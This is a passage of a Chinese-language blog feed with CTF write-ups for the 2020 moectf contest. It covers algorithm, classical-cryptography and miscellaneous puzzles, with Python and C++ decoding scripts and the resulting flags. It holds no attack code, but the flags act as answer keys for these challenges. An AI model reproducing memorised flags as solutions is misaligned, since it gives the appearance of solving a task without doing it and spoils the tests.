class="keyword">in</span> dirs3:</span><br><span class="line">path_3 = os.path.join(path_2,k)</span><br><span class="line">dirs4 = os.listdir(path_3)</span><br><span class="line"><span class="keyword">for</span> m <span class="keyword">in</span> dirs4:</span><br><span class="line">path_4 = os.path.join(path_3,m)</span><br><span class="line">print(path_4)</span><br><span class="line">f=<span class="built_in">open</span>(path_4)</span><br><span class="line">file = f.read()</span><br><span class="line">f.close()</span><br><span class="line">count += file.count(<span class="string">'FrankNB!'</span>)</span><br><span class="line">print(count.b64encode())</span><br><span class="line"></span><br><span class="line"><span class="comment">#moectf{MjA1MjMy}</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><h2 id="赤道企鹅-永远滴神"><a href="#赤道企鹅-永远滴神" class="headerlink" title="赤道企鹅, 永远滴神"></a>赤道企鹅, 永远滴神</h2><img src="/images/2020moectf-Algorithm\image-20201009180540819.png" class="lazyload" data-srcset="/images/2020moectf-Algorithm\image-20201009180540819.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201009180540819" style="zoom:67%;"><p>这个题就比前一个多一个数据处理,,,所以也没什么说的,直接贴脚本:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> *</span><br><span class="line">count_n = <span class="number">0</span></span><br><span class="line">count_y = <span class="number">0</span></span><br><span class="line">count = <span class="number">0</span></span><br><span class="line"></span><br><span class="line">path = <span class="string">"H:\Competitions\moectf\Algorithm\Eqqie\puzzle"</span></span><br><span class="line">dirs1 = os.listdir(path)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> dirs1:</span><br><span class="line">path_1 = os.path.join(path,i)</span><br><span class="line">dirs2 = os.listdir(path_1)</span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> dirs2:</span><br><span class="line">path_2 = os.path.join(path_1,j)</span><br><span class="line">dirs3 = os.listdir(path_2)</span><br><span class="line"><span class="keyword">for</span> k <span class="keyword">in</span> dirs3:</span><br><span class="line">path_3 = os.path.join(path_2,k)</span><br><span class="line">dirs4 = os.listdir(path_3)</span><br><span class="line"><span class="keyword">for</span> m <span class="keyword">in</span> dirs4:</span><br><span class="line">path_4 = os.path.join(path_3,m)</span><br><span class="line">print(path_4) <span class="comment">#遍历文件</span></span><br><span class="line">f = <span class="built_in">open</span>(path_4)</span><br><span class="line">file = f.read()</span><br><span class="line">f.close() <span class="comment">#读取文件</span></span><br><span class="line"><span class="keyword">if</span> file[<span class="number">7</span>]==<span class="string">'?'</span>:</span><br><span class="line">count_n += <span class="number">1</span></span><br><span class="line"><span class="keyword">continue</span></span><br><span class="line">count_y += <span class="number">1</span></span><br><span class="line">a = <span class="string">""</span></span><br><span class="line">a += file[<span class="number">7</span>:]</span><br><span class="line">flag = <span class="number">1</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> a:</span><br><span class="line"><span class="keyword">if</span> (<span class="string">'9'</span>>=i>=<span class="string">'0'</span> <span class="keyword">or</span> <span class="string">'z'</span>>=i>=<span class="string">'a'</span> <span class="keyword">or</span> <span class="string">'Z'</span>>=i>=<span class="string">'A'</span>):</span><br><span class="line"><span class="keyword">if</span> flag==<span class="number">1</span>:</span><br><span class="line">flag = <span class="number">0</span></span><br><span class="line">count += <span class="number">1</span></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">flag=<span class="number">1</span></span><br><span class="line"></span><br><span class="line">ans=<span class="built_in">str</span>(count).encode()</span><br><span class="line">print(b64encode(ans))</span><br><span class="line"><span class="comment">#moectf{MTgyNDI2}</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><h2 id="千层饼"><a href="#千层饼" class="headerlink" title="千层饼"></a>千层饼</h2><img src="/images/2020moectf-Algorithm\image-20201009181151021.png" class="lazyload" data-srcset="/images/2020moectf-Algorithm\image-20201009181151021.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201009181151021" style="zoom:67%;"><p>先放一下加密脚本吧:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> random <span class="keyword">import</span> Random</span><br><span class="line"><span class="keyword">from</span> flag <span class="keyword">import</span> flag</span><br><span class="line"></span><br><span class="line">alg = [b16encode, b32encode, b64encode, a85encode, b85encode]</span><br><span class="line"></span><br><span class="line">r = Random()</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(r.randrange(<span class="number">35</span>,<span class="number">40</span>)):</span><br><span class="line"> er = r.choice(alg)</span><br><span class="line"> flag = r.choice(alg)(<span class="built_in">str</span>(alg.index(er)).encode()) + <span class="string">b'eqqie_is_god'</span> + er(flag)</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">'secret.txt'</span>,<span class="string">'wb'</span>) <span class="keyword">as</span> out:</span><br><span class="line"> out.write(flag)</span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">'puzzle.txt'</span>, <span class="string">'wb'</span>) <span class="keyword">as</span> out:</span><br><span class="line"> out.write(flag)</span><br></pre></td></tr></table></figure><p>这个题的思路还是挺显而易见的,,,说白了就是“套娃”。这个题我先半手撕掉了,然后又写了全自动的脚本,半手撕的就不贴了,给个全自动的吧~~:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="built_in">dict</span>={}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">ini</span>():</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(alg)):</span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>):</span><br><span class="line">tmp = alg[i](<span class="built_in">str</span>(j).encode())</span><br><span class="line"><span class="built_in">dict</span>[tmp] = j</span><br><span class="line"></span><br><span class="line">alg = [b16encode, b32encode, b64encode, a85encode, b85encode]</span><br><span class="line">alg_s = [b16decode, b32decode, b64decode, a85decode, b85decode]</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">'puzzle.txt'</span>,<span class="string">'r'</span>) <span class="keyword">as</span> f:</span><br><span class="line">data = f.read()</span><br><span class="line"></span><br><span class="line">print(<span class="string">"index:"</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(alg)):</span><br><span class="line">print(<span class="string">" "</span>,i,<span class="string">": "</span>,alg[i])</span><br><span class="line"></span><br><span class="line">ini()</span><br><span class="line">count = <span class="number">0</span></span><br><span class="line">print(<span class="built_in">dict</span>)</span><br><span class="line"><span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line"><span class="keyword">if</span> <span class="string">'eqqie_is_god'</span> <span class="keyword">not</span> <span class="keyword">in</span> data:</span><br><span class="line">print(data)</span><br><span class="line"><span class="keyword">break</span></span><br><span class="line">key = data.index(<span class="string">'eqqie_is_god'</span>)</span><br><span class="line">print(data[:key])</span><br><span class="line">data = alg_s[<span class="built_in">int</span>(<span class="built_in">dict</span>[data[:key].encode()])](data[key+<span class="number">12</span>:]).decode()</span><br><span class="line">count = count+<span class="number">1</span></span><br><span class="line">print(count)</span><br><span class="line">print()</span><br><span class="line"><span class="comment"># moectf{so00Oo0oO_d31ici0us}</span></span><br></pre></td></tr></table></figure><p>emmm。。。我自认为我的代码还是比较容易理解的。就这样吧~~</p>]]></content>
<categories>
<category> CTF比赛题解 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> program </tag>
<tag> wp </tag>
</tags>
</entry>
<entry>
<title>2020moectf Classic Crypto</title>
<link href="2020/10/09/2020moectf-Classic-Crypto/"/>
<url>2020/10/09/2020moectf-Classic-Crypto/</url>
<content type="html"><</p><p>看了hint,瞬间明白了,他时候一个换表凯撒,这个就得自己写脚本搞了:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="built_in">string</span> table=<span class="string">"0abcdefghijklmnopqrstuvwxyz0123456789"</span>;<span class="comment">//这里有个小问题,就是我给table前面加了一个0,用来占位,,,毕竟从1开始还是比较舒服</span></span><br><span class="line"><span class="built_in">string</span> a;</span><br><span class="line"><span class="built_in">cin</span>>>a;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<a.size();i++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">int</span> temp;</span><br><span class="line"><span class="keyword">if</span>(a[i]!=<span class="string">'{'</span> && a[i]!=<span class="string">'}'</span> && a[i]!=<span class="string">'_'</span>) </span><br><span class="line">{</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> j=<span class="number">1</span>;j<table.size();j++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">if</span>(table[j]==a[i])</span><br><span class="line">{</span><br><span class="line"><span class="keyword">int</span> temp;</span><br><span class="line">temp=(j+<span class="number">36</span>*<span class="number">2</span>-i)%<span class="number">36</span>;</span><br><span class="line"><span class="built_in">cout</span><<table[temp];</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span> <span class="built_in">cout</span><<a[i]; </span><br><span class="line">}</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">} </span><br></pre></td></tr></table></figure><blockquote><p>密文: mpgfxk{j8w05q4_8xk_d7mhqfht}<br>明文: moectf{c0nquer_th3_un1v3rs3}</p></blockquote><h2 id="外面的世界"><a href="#外面的世界" class="headerlink" title="外面的世界"></a>外面的世界</h2><img src="/images/2020moectf Classic Crypto/image-20201008203506687.png" class="lazyload" data-srcset="/images/2020moectf Classic Crypto/image-20201008203506687.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201008203506687" style="zoom:67%;"><p>外面的世界 + 密文盲猜 => 栅栏密码</p><p>在线解密,</p><p>PS:做栅栏密码的时候一定要注意复制粘贴,别多复制空格了,,,你会解不出来的</p><blockquote><p>密文: mc{i33ny_-n~otR1n_cp1FN}efaFc32Tsuy</p><p>明文: moectf{Rai1F3nc3_3nc2ypT_1s-FunNy~}</p></blockquote><h2 id="大帝的征程-3"><a href="#大帝的征程-3" class="headerlink" title="大帝的征程#3"></a>大帝的征程#3</h2><img src="/images/2020moectf Classic Crypto/image-20201008204719395.png" class="lazyload" data-srcset="/images/2020moectf Classic Crypto/image-20201008204719395.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201008204719395" style="zoom:67%;"><p>啊这,,,这个密文出现了一些奇怪字符,应该是这个凯撒的table是整个ASCII表,,,然后想到(出题人提醒)在ASCII编码中有一种密码叫做<a href="https://blog.csdn.net/weixin_30298497/article/details/96365885?utm_medium=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.channel_param&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.channel_param">ROT47</a>,然后我们在线解密试一下:</p><blockquote><p>密文: >@64E7L4_?BF6C0E9b0)s$trN</p><p>明文: moectf{c0nquer_th3_XDSEC}</p></blockquote><h2 id="大帝的征程-维吉尼亚"><a href="#大帝的征程-维吉尼亚" class="headerlink" title="大帝的征程#维吉尼亚"></a>大帝的征程#维吉尼亚</h2><img src="/images/2020moectf Classic Crypto/image-20201009010325841.png" class="lazyload" data-srcset="/images/2020moectf Classic Crypto/image-20201009010325841.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201009010325841" style="zoom:67%;"><p>u1s1这个题目我是手撕的,,,因为我们的答案最后肯定是moectf{……},所以我们就用moectf,对应出key:dsecx</p><p>然后在线工具跑一下:</p><blockquote><p>密文:pgieqi{k0_ajxW_k-R3zq?}</p><p>密钥: dsecx</p><p>明文: moectf{s0_whaT_s-N3xt?}</p></blockquote><h2 id="大帝的征程-维吉尼亚Ex"><a href="#大帝的征程-维吉尼亚Ex" class="headerlink" title="大帝的征程#维吉尼亚Ex"></a>大帝的征程#维吉尼亚Ex</h2><img src="/images/2020moectf Classic Crypto/image-20201009011339610.png" class="lazyload" data-srcset="/images/2020moectf Classic Crypto/image-20201009011339610.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201009011339610" style="zoom:67%;"><p>下载附件,然后搜索到密文:ooukot{ig3_oqf1_Ymiedmms_BzVn3_s0w_w0_3csO}</p><p>这个题的话,,我就提供两种思路吧:</p><h3 id="手撕"><a href="#手撕" class="headerlink" title="手撕"></a>手撕</h3><p>他说难撕就难撕么???</p><p>我不信!我要试一试。</p><p>首先moectf绝对是没有问题的,又因为维吉尼亚只是字母在变化,数字没有改变,所以根据 3->e , 0->O以及部分密钥循环使用,我们可以猜一些东西 ig3->th3 , Ymiedmms -> Vigenere , w0 -> s0 , s0w -> n0t , 3csO -> 3asy……这个时候密钥好像就已经出来了(即使这个时候密钥没有完全出来,那么剩下1或者2个不确定的,暴力解决~~)。</p><blockquote><p>密文: ooukot{ig3_oqf1_Ymiedmms_BzVn3_s0w_w0_3csO}</p><p>密钥: caqivopzxmfde</p><p>明文: moectf{th3_rea1_Vigenere_MaYb3_n0t_s0_3asY}</p></blockquote><h3 id="正解"><a href="#正解" class="headerlink" title="正解"></a>正解</h3><p>这里有一种方法叫做<a href="https://www.cnblogs.com/ISGuXing/p/9665904.html">“重合指数对照”</a>来破解维吉尼亚密码,<a href="https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx">在线工具</a>在这里~~</p><p></p><p>要是知道密钥的长度并且填上去会快一点,但要是什么也不填,这个网站也挺快的~~</p><blockquote><p>moectf{th3_rea1_vigenere_mayb3_n0t_s0_3asy}</p></blockquote>]]></content>
<categories>
<category> CTF比赛题解 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> wp </tag>
<tag> Crypto </tag>
</tags>
</entry>
<entry>
<title>2020moectf-MISC</title>
<link href="2020/10/08/2020moectf-MISC/"/>
<url>2020/10/08/2020moectf-MISC/</url>
<content type="html"><![CDATA[<p>写在前面:这次moectf,misc一共17道,做出来了14道。然后最后发现misc占我总分比重22%左右,占比最高?好的我是misc手(~~~二进制手~~~)。然后这个方面wp也比较好写,就先写了misc的wp。然后没做的道题,等官方题解吧,,,真的不会了……</p><a id="more"></a><h2 id="我做出来的"><a href="#我做出来的" class="headerlink" title="我做出来的"></a>我做出来的</h2><h3 id="welcome"><a href="#welcome" class="headerlink" title="welcome"></a>welcome</h3><img src="/images/2020moectf-MISC/image-20201007194912998.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007194912998.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201007194912998" style="zoom: 67%;"><p>两个下载下来:一张图片和一个入门指南</p><p>图片:</p> <img src="/images/2020moectf-MISC/profession.jpg" class="lazyload" data-srcset="/images/2020moectf-MISC/profession.jpg" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="2" style="zoom:33%;"><p>毕竟是第一个题目嘛~~~应该不难。用winhex瞅瞅:<img src="/images/2020moectf-MISC/image-20201007195310368.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007195310368.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201007195310368"></p><blockquote><p>flag: moectf{Jo1n_0ur_professional_group}</p></blockquote><p>然后吧,,,那个pdf写的挺好的,,,留下来研读……</p><h3 id="MD5"><a href="#MD5" class="headerlink" title="MD5"></a>MD5</h3><img src="/images/2020moectf-MISC/image-20201007195738704.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007195738704.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201007195738704" style="zoom:67%;"><p><img src="/images/2020moectf-MISC/image-20201007195923023.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007195923023.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201007195923023"></p><p>这么,,恶臭,,,一定是flag了……</p><blockquote><p>flag:moectf{114514}</p></blockquote><h3 id="Base64"><a href="#Base64" class="headerlink" title="Base64"></a>Base64</h3><img src="/images/2020moectf-MISC/image-20201007200035920.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007200035920.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201007200035920" style="zoom:67%;"><blockquote><p>密文:bW9lY3RmJTdCZXpfYjY0JTIxJTdE</p><p>解密后:moectf{ez_b64!}</p></blockquote><h3 id="hey-fxck-you"><a href="#hey-fxck-you" class="headerlink" title="hey fxck you!"></a>hey fxck you!</h3><img src="/images/2020moectf-MISC/image-20201007200240371.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007200240371.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201007200240371" style="zoom:67%;"><p>下载下来是一个图片:</p><img src="/images/2020moectf-MISC/good_morning_my_neighbors (1).png" class="lazyload" data-srcset="/images/2020moectf-MISC/good_morning_my_neighbors (1).png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" style="zoom:50%;"><p>盲猜图片隐写:binwalk搞一下,<img src="/images/2020moectf-MISC/image-20201007200451400.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007200451400.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201007200451400"><br>得到这么一串奇奇怪怪的东西</p><blockquote><p>++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>++++++++++++++++++++++++++>++++++++++++++++++++++++++++>++++++++++++++++++++++++++++++<<<<<<<<<<<<<<<<-]>>>>>>>>—.++.<+++++.–.>+++++.<+++.>>—–.–.<<-.>-.<<<<<+.>>>>>>.<<.>.<<<<<.>>>>+.+++++.————.<+++++.>.<<<++.<.>>>>>>++++.</p></blockquote><p>这个的话,联系题目名字加上经验(其实要是搜索用的好,是可以搜出来的 这个编码叫做brain fuck,然后在线解密就完了<img src="/images/2020moectf-MISC/image-20201007201623970.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007201623970.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201007201623970" style="zoom:50%;"></p><blockquote><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">moectf{yes!yes!fk_U_2!}</span><br></pre></td></tr></table></figure></blockquote><h3 id="Base64?¿"><a href="#Base64?¿" class="headerlink" title="Base64?¿"></a>Base64?¿</h3><img src="/images/2020moectf-MISC/image-20201007201728209.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007201728209.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201007201728209" style="zoom:67%;"><p>顺手点开hint:</p><blockquote><p>vwxrstuopq34567ABCDEFGHIJyz012PQRSTKLMNOZabcdUVWXYefghijklmn89+/</p></blockquote><p>好了,base64换表,上脚本:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line">str1 = <span class="string">"0H9MJjCNPiMgJHMQJNtfyEJgIjtS1Ig="</span> <span class="comment"># 密文</span></span><br><span class="line"></span><br><span class="line">string1 = <span class="string">"vwxrstuopq34567ABCDEFGHIJyz012PQRSTKLMNOZabcdUVWXYefghijklmn89+/"</span> <span class="comment"># 换表</span></span><br><span class="line">string2 = <span class="string">"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> (base64.b64decode(str1.translate(<span class="built_in">str</span>.maketrans(string1,string2))))</span><br></pre></td></tr></table></figure><blockquote><p>moectf{itai_base64_qaq}</p></blockquote><h3 id="Pseudo-Encryption"><a href="#Pseudo-Encryption" class="headerlink" title="Pseudo Encryption"></a>Pseudo Encryption</h3><img src="/images/2020moectf-MISC/image-20201007205858294.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007205858294.png" 